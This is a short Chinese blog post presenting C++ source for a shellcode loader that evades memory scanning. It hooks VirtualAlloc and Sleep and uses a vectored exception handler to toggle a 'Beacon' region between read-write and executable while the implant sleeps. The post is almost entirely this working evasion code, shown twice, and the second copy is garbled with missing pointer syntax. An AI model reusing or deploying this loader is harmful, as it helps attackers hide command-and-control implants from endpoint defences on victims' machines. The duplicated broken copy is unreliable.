基于VEH异常处理规避可读写内存

前言：WBGII的思路，当看完WBGII这篇文章的时候，就学习到了一种思路。

参考文章：https://xz.aliyun.com/t/9399
参考文章：https://www.cnblogs.com/zpchcbd/p/12425557.html

代码实现

 #include "pch.h"
#include <iostream>
#include<Windows.h>
#include "detours.h"
#include "detver.h"
#pragma comment(lib,"detours_x64.lib")
 
LPVOID Beacon_address;
SIZE_T Beacon_data_len;
DWORD Beacon_Memory_address_flOldProtect;
HANDLE hEvent;
 
 
BOOL Vir_FLAG=TRUE;
LPVOID shellcode_addr;
 
 
static LPVOID (WINAPI *OldVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) = VirtualAlloc;
LPVOID WINAPI NewVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) {
	Beacon_data_len = dwSize;
	Beacon_address = OldVirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect);
	printf("分配大小:%d", Beacon_data_len);
	printf("分配地址:%llx \n", Beacon_address);
	return Beacon_address;
}
 
static VOID (WINAPI *OldSleep)(DWORD dwMilliseconds) = Sleep;
void WINAPI NewSleep(DWORD dwMilliseconds)
{
	if (Vir_FLAG)
	{
		VirtualFree(shellcode_addr, 0, MEM_RELEASE);
		Vir_FLAG = false;
	}
	printf("sleep时间:%d\n", dwMilliseconds);
	SetEvent(hEvent);
	OldSleep(dwMilliseconds);
}
 
void Hook()
{
	DetourRestoreAfterWith(); //避免重复HOOK
	DetourTransactionBegin(); // 开始HOOK
	DetourUpdateThread(GetCurrentThread());
	DetourAttach((PVOID*)&OldVirtualAlloc, NewVirtualAlloc);
	DetourAttach((PVOID*)&OldSleep, NewSleep);
	DetourTransactionCommit(); //  提交HOOK
}
 
void UnHook()
{
	DetourTransactionBegin();
	DetourUpdateThread(GetCurrentThread());
	DetourDetach((PVOID*)&OldVirtualAlloc, NewVirtualAlloc);
	DetourTransactionCommit();
}
 
size_t GetSize(char * szFilePath)
{
	size_t size;
	FILE* f = fopen(szFilePath, "rb");
	fseek(f, 0, SEEK_END);
	size = ftell(f);
	rewind(f);
	fclose(f);
	return size;
}
 
unsigned char* ReadBinaryFile(char *szFilePath, size_t *size)
{
	unsigned char *p = NULL;
	FILE* f = NULL;
	size_t res = 0;
	*size = GetSize(szFilePath);
	if (*size == 0) return NULL;
	f = fopen(szFilePath, "rb");
	if (f == NULL)
	{
		printf("Binary file does not exists!\n");
		return 0;
	}
	p = new unsigned char[*size];
	// Read file
	rewind(f);
	res = fread(p, sizeof(unsigned char), *size, f);
	fclose(f);
	if (res == 0)
	{
		delete[] p;
		return NULL;
	}
	return p;
}
 
BOOL is_Exception(DWORD64 Exception_addr)
{
	if (Exception_addr < ((DWORD64)Beacon_address + Beacon_data_len) && Exception_addr >(DWORD64)Beacon_address)
	{
		printf("地址符合:%llx\n", Exception_addr);
		return true;
	}
	printf("地址不符合:%llx\n", Exception_addr);
	return false;
}
 
LONG NTAPI FirstVectExcepHandler(PEXCEPTION_POINTERS pExcepInfo)
{
	printf("FirstVectExcepHandler\n");
	printf("异常错误码:%x\n", pExcepInfo->ExceptionRecord->ExceptionCode);
	printf("线程地址:%llx\n", pExcepInfo->ContextRecord->Rip);
	if (pExcepInfo->ExceptionRecord->ExceptionCode == 0xc0000005 && is_Exception(pExcepInfo->ContextRecord->Rip))
	{
		printf("恢复Beacon内存属性\n");
		VirtualProtect(Beacon_address, Beacon_data_len, PAGE_EXECUTE_READWRITE, &Beacon_Memory_address_flOldProtect);
		return EXCEPTION_CONTINUE_EXECUTION;
	}
	return EXCEPTION_CONTINUE_SEARCH;
}
 
DWORD WINAPI Beacon_set_Memory_attributes(LPVOID lpParameter)
{
	printf("Beacon_set_Memory_attributes启动\n");
	while (true)
	{
		WaitForSingleObject(hEvent, INFINITE); // 拿到信号
		printf("设置Beacon内存属性不可执行\n");
		VirtualProtect(Beacon_address, Beacon_data_len, PAGE_READWRITE, &Beacon_Memory_address_flOldProtect);
		ResetEvent(hEvent); // 挂起
	}
	return 0;
}
 
int main()
{
	hEvent = CreateEvent(NULL, TRUE, false, NULL);
 
	AddVectoredExceptionHandler(1, &FirstVectExcepHandler);
	Hook(); // 已经VirtualProtect钩住
	HANDLE hThread1 = CreateThread(NULL, 0, Beacon_set_Memory_attributes, NULL, 0, NULL);
	CloseHandle(hThread1);
 
	unsigned char *BinData = NULL;
	size_t size = 0;
 
	char* szFilePath = "C:\\Users\\WBG\\Downloads\\Test.bin";
	BinData = ReadBinaryFile(szFilePath, &size);
	shellcode_addr = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE);
	memcpy(shellcode_addr, BinData, size);
	VirtualProtect(shellcode_addr, size, PAGE_EXECUTE_READWRITE, &Beacon_Memory_address_flOldProtect);
	(*(int(*)()) shellcode_addr)();
 
	UnHook();
 
	return 0;
}

posted @ 2021-05-07 21:19 zpchcbd 阅读(233) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

记录部分个人学习和部分实战的笔记我会慢慢补全部分空白的文章 :)

基于VEH异常处理规避可读写内存

代码实现

我的标签

随笔档案

博客友链

	#include "pch.h"
	#include <iostream>
	#include<Windows.h>
	#include "detours.h"
	#include "detver.h"
	#pragma comment(lib,"detours_x64.lib")

	LPVOID Beacon_address;
	SIZE_T Beacon_data_len;
	DWORD Beacon_Memory_address_flOldProtect;
	HANDLE hEvent;


	BOOL Vir_FLAG=TRUE;
	LPVOID shellcode_addr;


	static LPVOID (WINAPI *OldVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) = VirtualAlloc;
	LPVOID WINAPI NewVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) {
	Beacon_data_len = dwSize;
	Beacon_address = OldVirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect);
	printf("分配大小:%d", Beacon_data_len);
	printf("分配地址:%llx \n", Beacon_address);
	return Beacon_address;
	}

	static VOID (WINAPI *OldSleep)(DWORD dwMilliseconds) = Sleep;
	void WINAPI NewSleep(DWORD dwMilliseconds)
	{
	if (Vir_FLAG)
	{
	VirtualFree(shellcode_addr, 0, MEM_RELEASE);
	Vir_FLAG = false;
	}
	printf("sleep时间:%d\n", dwMilliseconds);
	SetEvent(hEvent);
	OldSleep(dwMilliseconds);
	}

	void Hook()
	{
	DetourRestoreAfterWith(); //避免重复HOOK
	DetourTransactionBegin(); // 开始HOOK
	DetourUpdateThread(GetCurrentThread());
	DetourAttach((PVOID*)&OldVirtualAlloc, NewVirtualAlloc);
	DetourAttach((PVOID*)&OldSleep, NewSleep);
	DetourTransactionCommit(); // 提交HOOK
	}

	void UnHook()
	{
	DetourTransactionBegin();
	DetourUpdateThread(GetCurrentThread());
	DetourDetach((PVOID*)&OldVirtualAlloc, NewVirtualAlloc);
	DetourTransactionCommit();
	}

	size_t GetSize(char * szFilePath)
	{
	size_t size;
	FILE* f = fopen(szFilePath, "rb");
	fseek(f, 0, SEEK_END);
	size = ftell(f);
	rewind(f);
	fclose(f);
	return size;
	}

	unsigned char* ReadBinaryFile(char szFilePath, size_t size)
	{
	unsigned char *p = NULL;
	FILE* f = NULL;
	size_t res = 0;
	*size = GetSize(szFilePath);
	if (*size == 0) return NULL;
	f = fopen(szFilePath, "rb");
	if (f == NULL)
	{
	printf("Binary file does not exists!\n");
	return 0;
	}
	p = new unsigned char[*size];
	// Read file
	rewind(f);
	res = fread(p, sizeof(unsigned char), *size, f);
	fclose(f);
	if (res == 0)
	{
	delete[] p;
	return NULL;
	}
	return p;
	}

	BOOL is_Exception(DWORD64 Exception_addr)
	{
	if (Exception_addr < ((DWORD64)Beacon_address + Beacon_data_len) && Exception_addr >(DWORD64)Beacon_address)
	{
	printf("地址符合:%llx\n", Exception_addr);
	return true;
	}
	printf("地址不符合:%llx\n", Exception_addr);
	return false;
	}

	LONG NTAPI FirstVectExcepHandler(PEXCEPTION_POINTERS pExcepInfo)
	{
	printf("FirstVectExcepHandler\n");
	printf("异常错误码:%x\n", pExcepInfo->ExceptionRecord->ExceptionCode);
	printf("线程地址:%llx\n", pExcepInfo->ContextRecord->Rip);
	if (pExcepInfo->ExceptionRecord->ExceptionCode == 0xc0000005 && is_Exception(pExcepInfo->ContextRecord->Rip))
	{
	printf("恢复Beacon内存属性\n");
	VirtualProtect(Beacon_address, Beacon_data_len, PAGE_EXECUTE_READWRITE, &Beacon_Memory_address_flOldProtect);
	return EXCEPTION_CONTINUE_EXECUTION;
	}
	return EXCEPTION_CONTINUE_SEARCH;
	}

	DWORD WINAPI Beacon_set_Memory_attributes(LPVOID lpParameter)
	{
	printf("Beacon_set_Memory_attributes启动\n");
	while (true)
	{
	WaitForSingleObject(hEvent, INFINITE); // 拿到信号
	printf("设置Beacon内存属性不可执行\n");
	VirtualProtect(Beacon_address, Beacon_data_len, PAGE_READWRITE, &Beacon_Memory_address_flOldProtect);
	ResetEvent(hEvent); // 挂起
	}
	return 0;
	}

	int main()
	{
	hEvent = CreateEvent(NULL, TRUE, false, NULL);

	AddVectoredExceptionHandler(1, &FirstVectExcepHandler);
	Hook(); // 已经VirtualProtect钩住
	HANDLE hThread1 = CreateThread(NULL, 0, Beacon_set_Memory_attributes, NULL, 0, NULL);
	CloseHandle(hThread1);

	unsigned char *BinData = NULL;
	size_t size = 0;

	char* szFilePath = "C:\\Users\\WBG\\Downloads\\Test.bin";
	BinData = ReadBinaryFile(szFilePath, &size);
	shellcode_addr = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE);
	memcpy(shellcode_addr, BinData, size);
	VirtualProtect(shellcode_addr, size, PAGE_EXECUTE_READWRITE, &Beacon_Memory_address_flOldProtect);
	((int()()) shellcode_addr)();

	UnHook();

	return 0;
	}

记录部分个人学习和部分实战的笔记 我会慢慢补全部分空白的文章 :)

基于VEH异常处理规避可读写内存

代码实现

我的标签

随笔档案

博客友链

记录部分个人学习和部分实战的笔记我会慢慢补全部分空白的文章 :)